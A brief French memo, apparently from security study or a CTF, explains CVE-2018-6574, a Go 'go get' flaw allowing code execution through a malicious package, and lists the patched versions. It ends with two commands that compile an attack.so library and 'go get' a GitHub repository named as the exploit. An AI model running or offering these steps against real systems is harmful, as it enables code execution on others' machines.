
CVE-2018-6574 cette vulnérabilité impacte la commande go get de Golang et permet à un attaquant d'exécuter du code sur un système en installant une bibliothèque malveillante ; cette vulnérabilité a été corrigée dans Go 1.8. 7, 1.9. 4 et 1.10rc2. Golang construira des extensions natives.
gcc -shared -o attack.so -fPIC attack.c
go get github.com/zerbaliy3v/cve-2018-6574-exploit